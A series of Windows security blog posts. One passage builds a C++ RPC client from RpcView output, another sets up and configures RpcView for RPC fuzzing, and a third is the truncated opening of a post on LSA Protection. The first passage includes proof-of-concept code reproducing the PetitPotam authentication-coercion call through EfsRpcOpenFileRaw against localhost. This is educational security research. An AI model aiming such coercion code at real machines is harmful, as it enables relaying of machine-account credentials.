The next thing you want to do is go back to RpcView, select the “decompiled” interface definition, copy its content, and save it as a new file in your project. To do so, you can simply right-click on the “Source Files” folder, and then Add > New Item....

In the dialog box, we can select the C++ File (.cpp) template, and enter something like efsr.idl in the Name field. Although the template is not important, the extension of the file must be .idl because it determines which compiler Visual Studio will use for this file. In this case, it will use the MIDL compiler.

Once this is done, you should have a new file called efsr.idl in the “Source Files” folder. Next, we can right-click on our IDL file and compile it. But before doing so, make sure to select the appropriate target architecture: x86 or x64 here. Indeed, the MIDL compiler produces an architecture dependent code so, if you compile the IDL file for the x86 architecture and later decide to compile you application for the x64 architecture, you will most likely get into trouble.

If all goes well, you should see something like this in the Build Output window.

At this point, the MIDL compiler has created 3 files:

File Type Intended for Description
efsr_h.h Header file Client and Server Essentially function and structure definitions, well that’s a header file…
efsr_c.c Source file Client Code for the RPC runtime on client side
efsr_s.c Source file Server Code for the RPC runtime on server side, we don’t need this file

Although these files were created in the solution’s folder, they are not automatically added to the solution itself, so we need to do this manually.

  1. Right-click on the “Header Files” folder, Add > Existing Item... > efsr_h.h > Add.
  2. Right-click on the “Source Files” folder, Add > Existing Item... > efsr_c.c > Add.

Before going any further, we should make sure that both the header and the source files are well formed.

Here we can see that there is a problem with the file efsr_h.h. Some structure definitions were inserted in the middle of two function prototypes.

long Proc1_EfsRpcReadFileRaw_Downlevel(
  [in][context_handle] void* arg_0,
  [out]pipe char* arg_1);

long Proc2_EfsRpcWriteFileRaw_Downlevel(
  [in][context_handle] void* arg_0,
  [in]pipe char* arg_1);

If we check the definition of these two functions in the IDL file, we can see that the keyword pipe was inserted, but the MIDL compiler didn’t handle it properly. For now, we can simply remove this keyword and compile again.

Note: the type identified by RpcView was actually correct but, because of the syntax, the compiler failed to produce the correct output code. In the original IDL file, the type of arg_1 is EFS_EXIM_PIPE*, where EFS_EXIM_PIPE is indeed defined as a pipe unsigned char.

When dealing with IDL files generated by RpcView, this kind of error should be expected as the “decompilation” process is not supposed to produce an 100% usable result, straight out of the box. With time and practice though, you can quickly spot these issues and fix them.

After doing that, the header file looks much better. We no longer have syntax errors in this file.

The thing I usually do next is simply include the header file in the main source code, and compile as is to check if we have any errors.

#include "efsr_h.h"

int wmain(int argc, wchar_t* argv[])
{
    
}

Here we have 3 errors. The files were successfully compiled but the linker was not able to resolve some symbols: NdrClientCall3, MIDL_user_free, and MIDL_user_allocate.

First things first, the functions MIDL_user_allocate and MIDL_user_free are used to allocate and free memory for the RPC stubs. They are documented here and here. When implementing an RPC application, they must be defined somewhere in the application. It sounds more complicated than it really is though. In practice, we just have to add the following code to our main file.

void __RPC_FAR * __RPC_USER midl_user_allocate(size_t cBytes)
{
    return((void __RPC_FAR *) malloc(cBytes));
}

void __RPC_USER midl_user_free(void __RPC_FAR * p)
{
    free(p);
}

If we try to build the project again, we should see that the errors are now gone, and were replaced by two warnings that we can ignore.

One error remains though: the linker can’t find the NdrClientCall3 function. The NdrClientCall* functions are the cornerstone of the communication between the client and the server as they basically do all the heavy lifting on your behalf. Whenever you call a remote procedure, they serialize your parameters, send your request as a packet to the server, receive the response, deserialize it, and finally return the result.

As an example, here is what the definition of the EfsRpcOpenFileRaw procedure looks like in efsr_c.c. You can see that, on client side, EfsRpcOpenFileRaw basically consists of a “simple” call to NdrClientCall3.

long Proc0_EfsRpcOpenFileRaw_Downlevel( 
    /* [context_handle][out] */ void **arg_1,
    /* [string][in] */ wchar_t *arg_2,
    /* [in] */ long arg_3)
{

    CLIENT_CALL_RETURN _RetVal;

    _RetVal = NdrClientCall3(
                  ( PMIDL_STUBLESS_PROXY_INFO  )&DefaultIfName_ProxyInfo,
                  0,
                  0,
                  arg_1,
                  arg_2,
                  arg_3);
    return ( long  )_RetVal.Simple;
}

Note: I intentionally did not modify the function names generated by RpcView to highlight the fact that they do not matter. In the end, the server just receives an Opnum value, which is a numeric value that identifies the procedure to call internally. In the case of EfsRpcOpenFileRaw, this value would be 0 (second argument of NdrClientCall3).

CLIENT_CALL_RETURN RPC_VAR_ENTRY NdrClientCall3(
  MIDL_STUBLESS_PROXY_INFO *pProxyInfo,
  unsigned long            nProcNum,
  void                     *pReturnValue,
  ...                      
);

Let’s return to our error message. When the linker is not able to resolve a function symbol, it usually means that we have to explicitly specify where it can find it. And by “where”, I mean “in which DLL”. This kind of information can usually be found in the documentation, so let’s check what we can find about the NdrClientCall3 function here.

The documentation tells us that the NdrClientCall3 function is exported by the RpcRT4.dll DLL. Nothing surprising as it’s the DLL that implements the RPC runtime (remember my previous post?). This means that we have to reference the RpcRT4.lib file in our application. To do so, I personally use the following directive rather than modifying the configuration of the project.

#pragma comment(lib, "RpcRT4.lib")

If you followed along, your code should look like this, and you should also be able to build the project.

Writing a PoC

We already went through a lot of steps at this point, and our application still does nothing. So it’s time to see how to invoke a remote procedure. This process usually goes like this.

  1. Call RpcStringBindingCompose to create the string representation of the binding, you can think of it as a URL.
  2. Call RpcBindingFromStringBinding to create the binding handle based on the previous binding string.
  3. Call RpcStringFree to free the binding string as we don’t need it anymore.
  4. Optionally call RpcBindingSetAuthInfo or RpcBindingSetAuthInfoEx to set explicit authentication information on our binding handle.
  5. Use the binding handle to invoke remote procedures.
  6. Call RpcBindingFree to free the binding handle.

In my case, this yields the following stub code:

#include "efsr_h.h"
#include <iostream>

#pragma comment(lib, "RpcRT4.lib")

int wmain(int argc, wchar_t* argv[])
{
    RPC_STATUS status;
    RPC_WSTR StringBinding;
    RPC_BINDING_HANDLE Binding;

    status = RpcStringBindingCompose(
        NULL,                       // Interface's GUID, will be handled by NdrClientCall
        (RPC_WSTR)L"ncacn_np",      // Protocol sequence
        (RPC_WSTR)L"\\\\127.0.0.1", // Network address
        (RPC_WSTR)L"\\pipe\\lsass", // Endpoint
        NULL,                       // No options here
        &StringBinding              // Output string binding
    );

    wprintf(L"[*] RpcStringBindingCompose status code: %d\r\n", status);

    wprintf(L"[*] String binding: %ws\r\n", StringBinding);

    status = RpcBindingFromStringBinding(
        StringBinding,              // Previously created string binding
        &Binding                    // Output binding handle
    );

    wprintf(L"[*] RpcBindingFromStringBinding status code: %d\r\n", status);

    status = RpcStringFree(
        &StringBinding              // Previously created string binding
    );

    wprintf(L"[*] RpcStringFree status code: %d\r\n", status);

    RpcTryExcept
    {
        // Invoke remote procedure here
    }
    RpcExcept(EXCEPTION_EXECUTE_HANDLER);
    {
        wprintf(L"Exception: %d - 0x%08x\r\n", RpcExceptionCode(), RpcExceptionCode());
    }
    RpcEndExcept

    status = RpcBindingFree(
        &Binding                    // Reference to the opened binding handle
    );

    wprintf(L"[*] RpcBindingFree status code: %d\r\n", status);
}

void __RPC_FAR* __RPC_USER midl_user_allocate(size_t cBytes)
{
    return((void __RPC_FAR*) malloc(cBytes));
}

void __RPC_USER midl_user_free(void __RPC_FAR* p)
{
    free(p);
}

Note: I would recommended invoking remote procedures inside a try/catch because exceptions are quite common in the context of the RPC runtime. Sometimes exceptions simply occur because the syntax of the request is incorrect but, in other cases, servers can also just throw exceptions rather than returning an error code.

We can already compile this code and make sure everything is OK. RPC functions return an RPC_STATUS code. If they execute successfully, they return the value 0, which means RPC_S_OK. If that’s not the case, you can check the documentation here to determine what’s wrong, or you can even write a function to print the corresponding Win32 error message.

C:\Workspace\EfsrClient\x64\Release>EfsrClient.exe
[*] RpcStringBindingCompose status code: 0
[*] String binding: ncacn_np:\\\\127.0.0.1[\\pipe\\lsass]
[*] RpcBindingFromStringBinding status code: 0
[*] RpcStringFree status code: 0
[*] RpcBindingFree status code: 0

Now that we have our binding handle, we can try and invoke the EfsRpcOpenFileRaw procedure. But wait… There is a problem with the function’s prototype. It doesn’t take a binding handle as an argument.

If we go back to the definition of the function in the IDL file, we can see that there is indeed an issue. The argument list should start with arg_0, as shown in the next procedure, EfsRpcReadFileRaw. Therefore, something is missing.

long Proc0_EfsRpcOpenFileRaw_Downlevel(
  [out][context_handle] void** arg_1,
  [in][string] wchar_t* arg_2,
  [in]long arg_3);

long Proc1_EfsRpcReadFileRaw_Downlevel(
  [in][context_handle] void* arg_0,
  [out] char* arg_1);

The missing arg_0 argument is precisely the binding handle we need to pass to the RPC runtime. It’s a typical error I’ve encountered numerous times with RpcView. However, I don’t know if it’s a problem with the tool or a misunderstanding on my part.

Another thing that should tip you off is the fact that the EfsRpcOpenFileRaw procedure returns a context handle as an output value ([out][context_handle] void** arg_1). This is a very common thing for RPC servers. They often expose a procedure that takes a binding handle as an input value and yields a context handle that you must use in later RPC calls.

So, let’s fix this and compile the IDL file once again.

long Proc0_EfsRpcOpenFileRaw_Downlevel(
  [in]handle_t arg_0,
  [out][context_handle] void** arg_1,
  [in][string] wchar_t* arg_2,
  [in]long arg_3);

Now, we know that arg_0 is the binding handle. We also know that arg_1 is a reference to the output context handle. Here, we suppose we don’t know the details of the context structure, but that’s not an issue. We can just pass a reference to an arbitrary void* variable. Then, we don’t know what arg_2 and arg_3 are. Since arg_2 is a wchar_t* and the name of the procedure is EfsRpcOpenFileRaw we can assume that arg_2 is supposed to be a file path. The value of arg_3 is yet to be determined. However, we know that it’s a long so we can arbitrarily set it to 0, and see what happens.

RpcTryExcept
{
    // Invoke remote procedure here
    PVOID pContext;
    LPWSTR pwszFilePath;
    long result;

    pwszFilePath = (LPWSTR)LocalAlloc(LPTR, MAX_PATH * sizeof(WCHAR));
    StringCchPrintf(pwszFilePath, MAX_PATH, L"C:\\Workspace\\foo123.txt");

    wprintf(L"[*] Invoking EfsRpcOpenFileRaw with target path: %ws\r\n", pwszFilePath);
    result = Proc0_EfsRpcOpenFileRaw_Downlevel(Binding, &pContext, pwszFilePath, 0);
    wprintf(L"[*] EfsRpcOpenFileRaw status code: %d\r\n", result);

    LocalFree(pwszFilePath);
}
RpcExcept(EXCEPTION_EXECUTE_HANDLER);
{
    wprintf(L"Exception: %d - 0x%08x\r\n", RpcExceptionCode(), RpcExceptionCode());
}
RpcEndExcept
C:\Workspace\EfsrClient\x64\Release>EfsrClient.exe
[*] RpcStringBindingCompose status code: 0
[*] String binding: ncacn_np:\\\\127.0.0.1[\\pipe\\lsass]
[*] RpcBindingFromStringBinding status code: 0
[*] RpcStringFree status code: 0
[*] Invoking EfsRpcOpenFileRaw with target path: C:\Workspace\foo123.txt
[*] EfsRpcOpenFileRaw status code: 5
[*] RpcBindingFree status code: 0

Running this code, EfsRpcOpenFileRaw fails with the standard Win32 error code 5, which means “Access denied”. This kind of error can be very frustrating because you don’t really know what is going wrong. An “Access denied” error can be returned for a large number of reasons (e.g.: insufficient privileges, wrong combination of parameters, etc.).

Normally, you would have to start reversing the target procedure in order to determine why the server returns this error. However, for the sake of conciseness, I will cheat a bit and just check the documentation. In the documentation of EfsRpcOpenFileRaw, you can read that the third parameter is indeed a “FileName”, but more precisely, it’s an “EFSRPC identifier”. And according to this documentation, “EFSRPC identifiers” are supposed to be UNC paths. So, we can change the following line of code and see if this solves the problem.

StringCchPrintf(pwszFilePath, MAX_PATH, L"\\\\127.0.0.1\\C$\\Workspace\\foo123.txt");

After modifying the code, the server now returns the error code 2, which means “File not found”. That’s a good sign.

C:\Workspace\EfsrClient\x64\Release>EfsrClient.exe
[*] RpcStringBindingCompose status code: 0
[*] String binding: ncacn_np:\\\\127.0.0.1[\\pipe\\lsass]
[*] RpcBindingFromStringBinding status code: 0
[*] RpcStringFree status code: 0
[*] Invoking EfsRpcOpenFileRaw with target path: \\127.0.0.1\C$\Workspace\foo123.txt
[*] EfsRpcOpenFileRaw status code: 2
[*] RpcBindingFree status code: 0

Identifying a Interesting Behavior

With Process Monitor running in the background, we can see that lsass.exe indeed tried to access the file \\127.0.0.1\C$\Workspace\foo123.txt, which does not exist, hence the “File not found” error.

However, if we check the details of the CreateFile operation, we can see that the RPC server is actually impersonating the client. In other words, we could have simply called CreateFile ourselves and the result would have been the same.

What’s interesting though is what happens before lsass.exe tries to access the target file. Indeed, it opens the named pipe \pipe\srvsvc, this time without impersonating the client. If you saw my post about PrintSpoofer, you know that a similar behavior was observed with the Print Spooler server, which tried to open the named pipe \pipe\spoolss.

Of course, the NT AUTHORITY\SYSTEM account cannot be used for network authentication. So, when invoking this procedure with a remote path on a domain-joined machine, Windows will actually use the machine account to authenticate on the remote server. This explains why “PetitPotam” is able to coerce an arbitrary Windows host to authenticate to another machine.

And here is the final code.

#include "efsr_h.h"
#include <iostream>
#include <strsafe.h>

#pragma comment(lib, "RpcRT4.lib")

int wmain(int argc, wchar_t* argv[])
{
    RPC_STATUS status;
    RPC_WSTR StringBinding;
    RPC_BINDING_HANDLE Binding;

    status = RpcStringBindingCompose(
        NULL,                       // Interface's GUID, will be handled by NdrClientCall
        (RPC_WSTR)L"ncacn_np",      // Protocol sequence
        (RPC_WSTR)L"\\\\127.0.0.1", // Network address
        (RPC_WSTR)L"\\pipe\\lsass", // Endpoint
        NULL,                       // No options here
        &StringBinding              // Output string binding
    );

    wprintf(L"[*] RpcStringBindingCompose status code: %d\r\n", status);

    wprintf(L"[*] String binding: %ws\r\n", StringBinding);

    status = RpcBindingFromStringBinding(
        StringBinding,              // Previously created string binding
        &Binding                    // Output binding handle
    );

    wprintf(L"[*] RpcBindingFromStringBinding status code: %d\r\n", status);

    status = RpcStringFree(
        &StringBinding              // Previously created string binding
    );

    wprintf(L"[*] RpcStringFree status code: %d\r\n", status);

    RpcTryExcept
    {
        // Invoke remote procedure here
        PVOID pContext;
        LPWSTR pwszFilePath;
        long result;

        pwszFilePath = (LPWSTR)LocalAlloc(LPTR, MAX_PATH * sizeof(WCHAR));
        //StringCchPrintf(pwszFilePath, MAX_PATH, L"C:\\Workspace\\foo123.txt");
        StringCchPrintf(pwszFilePath, MAX_PATH, L"\\\\127.0.0.1\\C$\\Workspace\\foo123.txt");

        wprintf(L"[*] Invoking EfsRpcOpenFileRaw with target path: %ws\r\n", pwszFilePath);
        result = Proc0_EfsRpcOpenFileRaw_Downlevel(Binding, &pContext, pwszFilePath, 0);
        wprintf(L"[*] EfsRpcOpenFileRaw status code: %d\r\n", result);

        LocalFree(pwszFilePath);
    }
    RpcExcept(EXCEPTION_EXECUTE_HANDLER);
    {
        wprintf(L"Exception: %d - 0x%08x\r\n", RpcExceptionCode(), RpcExceptionCode());
    }
    RpcEndExcept

    status = RpcBindingFree(
        &Binding                    // Reference to the opened binding handle
    );

    wprintf(L"[*] RpcBindingFree status code: %d\r\n", status);
}

void __RPC_FAR* __RPC_USER midl_user_allocate(size_t cBytes)
{
    return((void __RPC_FAR*) malloc(cBytes));
}

void __RPC_USER midl_user_free(void __RPC_FAR* p)
{
    free(p);
}

Conclusion

In this blog post, we saw how it was possible to get all the information we need from RpcView to build a lightweight client application in C/C++. In particular, we saw how we could reproduce the “PetitPotam” trick by invoking the EfsRpcOpenFileRaw procedure of the EFSR interface. I tried to include as much details as I could, but of course, I cannot cover every aspect of Windows RPC in a single post. If you are interested in Windows RPC, @0xcsandker also wrote an excellent blog post about this subject here: Offensive Windows IPC Internals 2: RPC. His posts are always worth a read as they are thorough and aggregate a lot of information.

I also tried to cover some practical issues and errors you often encounter when implementing an RPC client in C/C++. But again, you will have to deal with a lot of other errors when compiling or invoking remote procedures, if you decide to go this route. Thankfully, a lot of Windows RPC interfaces are documented, such as EFSRPC, so that’s a good starting point.

Finally, implementing an RPC client in C/C++ isn’t necessarily the best approach if you are doing some security oriented research as this process is rather time-consuming. However, I would still recommend it because it is a good way to learn and have a better understanding of some Windows internals. As an alternative, a more research oriented approach would consist in using the NtObjectManager module developed by James Forshaw. This module is quite powerful as it allows you to interact with an RPC server in a few lines of PowerShell. As usual, James wrote an excellent article about it here: Calling Local Windows RPC Servers from .NET.

Links & Resources

Fuzzing Windows RPC with RpcView

The recent release of PetitPotam by @topotam77 motivated me to get back to Windows RPC fuzzing. On this occasion, I thought it would be cool to write a blog post explaining how one can get into this security research area.

RPC as a Fuzzing Target?

As you know, RPC stands for “Remote Procedure Call”, and it isn’t a Windows specific concept. The first implementations of RPC were made on UNIX systems in the eighties. This allowed machines to communicate with each other on a network, and it was even “used as the basis for Network File System (NFS)” (source: Wikipedia).

The RPC implementation developed by Microsoft and used on Windows is DCE/RPC, which is short for “Distributed Computing Environment / Remote Procedure Calls” (source: Wikipedia). DCE/RPC is only one of the many IPC (Interprocess Communications) mechanisms used in Windows. For example, it’s used to allow a local process or even a remote client on the network to interact with another process or a service on a local or remote machine.

As you will have understood, the security implications of such a protocol are particularly interesting. Vulnerabilities in a an RPC server may have various consequences, ranging from Denial of Service (DoS) to Remote Code Execution (RCE) and including Local Privilege Escalation (LPE). Coupled with the fact that the code of the legacy RPC servers on Windows is often quite old (if we exclude the more recent (D)COM model), this makes it a very interesting target for fuzzing.

How to Fuzz Windows RPC?

To be clear, this post is not about advanced and automated fuzzing. Others, far more talented than me, already discussed this topic. Rather, I want to show how a beginner can get into this kind of research without any knowledge in this field.

Pentesters use Windows RPC every time they work in Windows / Active Directory environments with impacket-based tools, perhaps without always being fully aware of it. The use of Windows RPC was probably made a bit more obvious with tools such as SpoolSample (a.k.a the “Printer Bug”) by @tifkin_ or, more recently, PetitPotam by @topotam77.

If you want to know how these tools work, or if you want to find bugs in Windows RPC by yourself, I think there are two main approaches. The first approach consists in looking for interesting keywords in the documentation and then experimenting by modyfing the impacket library or by writing an RPC client in C. As explained by @topotam77 in the episode 0x09 of the French Hack’n Speak podcast, this approach was particularly efficient in the conception of PetitPotam. However, it has some limitations. The main one is that not all RPC interfaces are documented, and even the existing documentation isn’t always complete. Therefore, the second approach consists in enumerating the RPC servers directly on a Windows machine, with a tool such as RpcView.

RpcView

If you are new to Windows RPC analysis, RpcView is probably the best tool to get started. It is able to enumerate all the RPC servers that are running on a machine and it provides all the collected information in a very neat GUI (Graphical User Interface). When you are not yet familiar with a technical and/or abstract concept, being able to visualize things this way is an undeniable benefit.

Note: this screenshot was taken from https://rpcview.org/.

This tool was originally developed by 4 French researchers - Jean-Marie Borello, Julien Boutet, Jeremy Bouetard and Yoanne Girardin (see authors) - in 2017 and is still actively maintained. Its use was highlighted at PacSec 2017 in the presentation A view into ALPC-RPC by Clément Rouault and Thomas Imbert. This presentation also came along with the tool RPCForge.

Downloading and Running RpcView for the First Time

RpcView’s official repository is located here: https://github.com/silverf0x/RpcView. For each commit, a new release is automatically built through AppVeyor. So, you can always download the latest version of RpcView here.

After extracting the 7z archive, you just have to execute RpcView.exe (ideally as an administrator), and you should be ready to go. However, if the version of Windows you are using is too recent, you will probably get an error similar to the one below.

According to the error message, our “runtime version” is not supported, and we are supposed to send our rpcrt4.dll file to the dev team. This message may sound a bit cryptic for a neophyte but there is nothing to worry about, that’s completely fine.

The library rpcrt4.dll, as its name suggests, literally contains the “RPC runtime”. In other words, it contains all the necessary base code that allows an RPC client and an RPC server to communicate with each other.

Now, if we take a look at the README on GitHub, we can see that there is a section entitled How to add a new RPC runtime. It tells us that there are two ways to solve this problem. The first way is to just edit the file RpcInternals.h and add our runtime version. The second way is to reverse rpcrt4.dll in order to define the required structures such as RPC_SERVER. Honestly, the implementation of the RPC runtime doesn’t change that often, so the first option is perfectly fine in our case.

Compiling RpcView

We saw that our RPC runtime is not currently supported, so we will have to update RpcInternals.h with our runtime version and build RpcView from the source. To do so, we will need the following:

  • Visual Studio 2019 (Community)
  • CMake >= 3.13.2
  • Qt5 == 5.15.2

Note: I strongly recommend using a Virtual Machine for this kind of setup. For your information, I also use Chocolatey - the package manager for Windows - to automate the installation of some of the tools (e.g.: Visual Studio, GIT tools).

Installing Visual Studio 2019

You can download Visual Studio 2019 here or install it with Chocolatey.

choco install visualstudio2019community

While you’re at it, you should also install the Windows SDK as you will need it later on. I use the following code in PowerShell to find the latest available version of the SDK.

[string[]]$sdks = (choco search windbg | findstr "windows-sdk")
$sdk_latest = ($sdks | Sort-Object -Descending | Select -First 1).split(" ")[0]

And I install it with Chocolatey. If you want to install it manually, you can also download the web installer here.

choco install $sdk_latest

Once, Visual Studio is installed. You have to open the “Visual Studio Installer”.

And install the “Desktop development with C++” toolkit. I hope you have a solid Internet connection and enough disk space… :grimacing:

Installing CMake

Installing CMake is as simple as running the following command with Chocolatey. But, again, you can also download it from the official website and install it manually.

choco install cmake

Note: CMake is also part of Visual Studio “Desktop development with C++”, but I never tried to compile RpcView with this version.

Installing Qt

At the time of writing, the README specifies that the version of Qt used by the project is 5.15.2. I highly recommend using the exact same version, otherwise you will likely get into trouble during the compilation phase.

The question is how do you find and download Qt5 5.15.2? That’s were things get a bit tricky because the process is a bit convoluted. First, you need to register an account here. This will allow you to use their custom web installer. Then, you need to download the installer here.

Once you have started the installer, it will prompt you to log in with your Qt account.

After that, you can leave everything as default. However, at the “Select Components” step, make sure to select Qt 5.15.2 for MSVC 2019 32 & 64 bits only. That’s already 2.37 GB of data to download, but if you select everything, that represents around 60 GB. :open_mouth:

If you are lucky enough, the installer should run flawlessly, but if you are not, you will probably encounter an error similar to the one below. At the time of writing, an issue is currently open on their bug tracker here, but they don’t seem to be in a hurry to fix it.

To solve this problem, I wrote a quick and dirty PowerShell script that downloads all the required files directly from the closest Qt mirror. That’s probably against the terms of use, but hey, what can you do?! I just wanted to get the job done.

If you let all the values as default, the script will download and extract all the required files for Visual Studio 2019 (32 & 64 bits) in C:\Qt\5.15.2\.

Note: make sure 7-Zip is installed before running this script!

# Update these settings according to your needs but the default values should be just fine.
$DestinationFolder = "C:\Qt"
$QtVersion = "qt5_5152"
$Target = "msvc2019"
$BaseUrl = "https://download.qt.io/online/qtsdkrepository/windows_x86/desktop"
$7zipPath = "C:\Program Files\7-Zip\7z.exe"

# Store all the 7z archives in a Temp folder.
$TempFolder = Join-Path -Path $DestinationFolder -ChildPath "Temp"
$null = [System.IO.Directory]::CreateDirectory($TempFolder)

# Build the URLs for all the required components.
$AllUrls = @("$($BaseUrl)/tools_qtcreator", "$($BaseUrl)/$($QtVersion)_src_doc_examples", "$($BaseUrl)/$($QtVersion)")

# For each URL, retrieve and parse the "Updates.xml" file. This file contains all the information
# we need to dowload all the required files.
foreach ($Url in $AllUrls) {
    $UpdateXmlUrl = "$($Url)/Updates.xml"
    $UpdateXml = [xml](New-Object Net.WebClient).DownloadString($UpdateXmlUrl)
    foreach ($PackageUpdate in $UpdateXml.GetElementsByTagName("PackageUpdate")) {
        $DownloadableArchives = @()
        if ($PackageUpdate.Name -like "*$($Target)*") {
            $DownloadableArchives += $PackageUpdate.DownloadableArchives.Split(",") | ForEach-Object { $_.Trim() } | Where-Object { -not [string]::IsNullOrEmpty($_) }
        }
        $DownloadableArchives | Sort-Object -Unique | ForEach-Object {
            $Filename = "$($PackageUpdate.Version)$($_)"
            $TempFile = Join-Path -Path $TempFolder -ChildPath $Filename
            $DownloadUrl = "$($Url)/$($PackageUpdate.Name)/$($Filename)"
            if (Test-Path -Path $TempFile) {
                Write-Host "File $($Filename) found in Temp folder!"
            }
            else {
                Write-Host "Downloading $($Filename) ..."
                (New-Object Net.WebClient).DownloadFile($DownloadUrl, $TempFile)
            }
            Write-Host "Extracting file $($Filename) ..."
            &"$($7zipPath)" x -o"$($DestinationFolder)" $TempFile | Out-Null
        }
    }
}

Building RpcView

We should be ready to go. One last piece is missing though: the RPC runtime version. When I first tried to build RpcView from the source files, I was a bit confused and I didn’t really know which version number was expected, but it’s actually very simple (once you know what to look for…).

You just have to open the properties of the file C:\Windows\System32\rpcrt4.dll and get the File Version. In my case, it’s 10.0.19041.1081.

Then, you can download the source code.

git clone https://github.com/silverf0x/RpcView

After that, we have to edit both .\RpcView\RpcCore\RpcCore4_64bits\RpcInternals.h and .\RpcView\RpcCore\RpcCore4_32bits\RpcInternals.h. At the beginning of this file, there is a static array that contains all the supported runtime versions.

static UINT64 RPC_CORE_RUNTIME_VERSION[] = {
    0x6000324D70000LL,  //6.3.9431.0000
    0x6000325804000LL,  //6.3.9600.16384
    ...
    0xA00004A6102EALL,  //10.0.19041.746
    0xA00004A61041CLL,  //10.0.19041.1052
}

We can see that each version number is represented as a longlong value. For example, the version 10.0.19041.1052 translates to:

0xA00004A61041 = 0x000A (10) || 0x0000 (0) || 0x4A61 (19041) || 0x041C (1052)

If we apply the same conversion to the version number 10.0.19041.1081, we get the following result.

static UINT64 RPC_CORE_RUNTIME_VERSION[] = {
    0x6000324D70000LL,  //6.3.9431.0000
    0x6000325804000LL,  //6.3.9600.16384
    ...
    0xA00004A6102EALL,  //10.0.19041.746
    0xA00004A61041CLL,  //10.0.19041.1052
    0xA00004A610439LL,  //10.0.19041.1081
}

Finally, we can generate the Visual Studio solution and build it. I will show only the 64-bits compilation process, but if you want to compile the 32-bits version, you can refer to the documentation. The process is very similar anyway.

For the next commands, I assume the following:

  • Qt is installed in C:\Qt\5.15.2\.
  • CMake is installed in C:\Program Files\CMake\.
  • The current working directory is RpcView’s source folder (e.g.: C:\Users\lab-user\Downloads\RpcView\).
mkdir Build\x64
cd Build\x64
set CMAKE_PREFIX_PATH=C:\Qt\5.15.2\msvc2019_64\
"C:\Program Files\CMake\bin\cmake.exe" ../../ -A x64
"C:\Program Files\CMake\bin\cmake.exe" --build . --config Release

Finally, you can download the latest release from AppVeyor here, extract the files, and replace RpcCore4_64bits.dll and RpcCore4_32bits.dll with the versions that were compiled and copied to .\RpcView\Build\x64\bin\Release\.

If all went well, RpcView should finally be up and running! :tada:

Patching RpcView

If you followed along, you probably noticed that, in the end, we did all that just to add a numeric value to two DLLs. Of course, there is a more straightforward way to get the same result. We can just patch the existing DLLs and replace one of the existing values with our own runtime version.

To do so, I will open the two DLLs with HxD. We know that the value 0xA00004A61041C is present in both files, so we can try to locate it within the binary data. Values are stored using the little-endian byte ordering though, so we actually have to search for the hexadecimal pattern 1C04614A00000A00.

Here, we just have to replace the value 1C04 (0x041C = 1052) with 3904 (0x0439 = 1081) because the rest of the version number is the same (10.0.19041).

After saving the two files, RpcView should be up and running. That’s a dirty hack, but it works and it’s way more effective than building the project from the source! :roll_eyes:

Update: Using the “Force” Flag

As it turns out, you don’t even need to go through all this trouble. RpcView has an undocumented /force command line flag that you can use to override the RPC runtime version check.

.\RpcView64\RpcView.exe /force

Honestly, I did not look at the code at all. Otherwise I would have probably seen this. Lesson learned. Thanks @Cr0Eax for bringing this to my attention (source: Twitter). Anyway, building it and patching it was a nice challenge I guess. :sweat_smile:

Initial Configuration

Now that RpcView is up and running, we need to tweak it a little bit in order to make it really usable.

The Refresh Rate

The first thing you want to do is lower the refresh rate, especially if you are running it inside a Virtual Machine. Setting it to 10 seconds is perfectly fine. You could even set this parameter to “manual”.

Symbols

On the screenshot below, we can see that there is section which is supposed to list all the procedures or functions that are exposed through an RPC server, but it actually only contains addresses.

This isn’t very convenient, but there is a cool thing about most Windows binaries. Microsoft publishes their associated PDB (Program DataBase) file.

PDB is a proprietary file format (developed by Microsoft) for storing debugging information about a program (or, commonly, program modules such as a DLL or EXE) - source: Wikipedia

These symbols can be configured through the Options > Configure Symbols menu item. Here, I set it to srv*C:\SYMBOLS.

The only caveat is that RpcView is not able, unlike other tools, to download the PDB files automatically. So, we need to download them beforehand.

If you have downloaded the Windows 10 SDK, this step should be quite easy though. The SDK includes a tool called symchk.exe which allows you to fetch the PDB files for almost any EXE or DLL, directly from Microsoft’s servers. For example, the following command allows you to download the symbols for all the DLLs in C:\Windows\System32\.

cd "C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\"
symchk /s srv*c:\SYMBOLS*https://msdl.microsoft.com/download/symbols C:\Windows\System32\*.dll

Once the symbols have been downloaded, RpcView must be restarted. After that, you should see that the name of each function is resolved in the “Procedures” section. :ok_hand:

Conclusion

This post is already longer than I initially anticipated, so I will end it there. If you are new to this, I think you already have all the basics to get started. The main benefit of a GUI-based tool such as RpcView is that you can very easily explore and visualize some internals and concepts that might be difficult to grasp otherwise.

If you liked this post, don’t hesitate to let me know on Twitter. I only scratched the surface here, but this could be the beginning of a series in which I explore Windows RPC. In the next part, I could explain how to interact with an RPC server. In particular, I think it would be a good idea to use PetitPotam as an example, and show how you can reproduce it, based on the information you can get from RpcView.

Links & Resources

Do You Really Know About LSA Protection (RunAsPPL)?

When it comes to protecting against credentials theft on Windows, enabling LSA Protection (a.k.a. RunAsPPL) on LSASS may be considered as the very first recommendation to implement. But do you really know what a PPL is? In this post, I want to cover some core concepts about Protected Processes and also prepare the ground for a follow-up article that will be released in the coming days.

Introduction

When you think about it, RunAsPPL for LSASS is a true quick win. It is very easy to configure as the only thing you have to do is add a simple value in the registry and reboot. Like any other protection though, it is not bulletproof and it is not sufficient on its own, but it is still particularly efficient. Attackers will have to use some relatively advanced tricks if they want to work around it, which ultimately increases their chance of being detected.

Therefore, as a security consultant, this is one of the top recommendations I usually give to a client. However, from a client’s perspective, I noticed that this protection tends to be confused with Credential Guard, which is completely different. I think that this confusion comes from the fact that the latter seems to provide a more robust mechanism although Credential Guard and LSA Protection are actually complementary.

But of course, as a consultant, you have to explain these concepts if you want to convince a client that they should implement both recommendations. Some time ago, I had to give such explanation so, without going into too much detail, I think I said something like this about LSA Protection: “only a digitally signed binary can access a protected process”. You probably noticed that this sentence does not make much sense. This is how I realized that I didn’t really know how Protected Processes worked. So, I did some research and I found some really interesting things along the way, hence why I wanted to write about it.

Disclaimer – Most of the concepts I discuss in this post are already covered by the official documentation and the book Windows Internals 7th edition (Part 1), which were my two main sources of information. The objective of this blog post is not to paraphrase them but rather gather the information which I think is the most valuable from a security consultant’s perspective.

How to Enable LSA Protection (RunAsPPL)

As mentioned previously, RunAsPPL is very easy to enable. The procedure is detailed in the official documentation and has also been covered in many blog posts before.

If you want to enable it within a corporate environment, you should follow the procedure provided by Microsoft and create a Group Policy: Configuring Additional LSA Protection. But if you just want to enable it manually on a single machine, you just have to:

  1. open the Registry Editor (regedit.exe) as an Administrator;
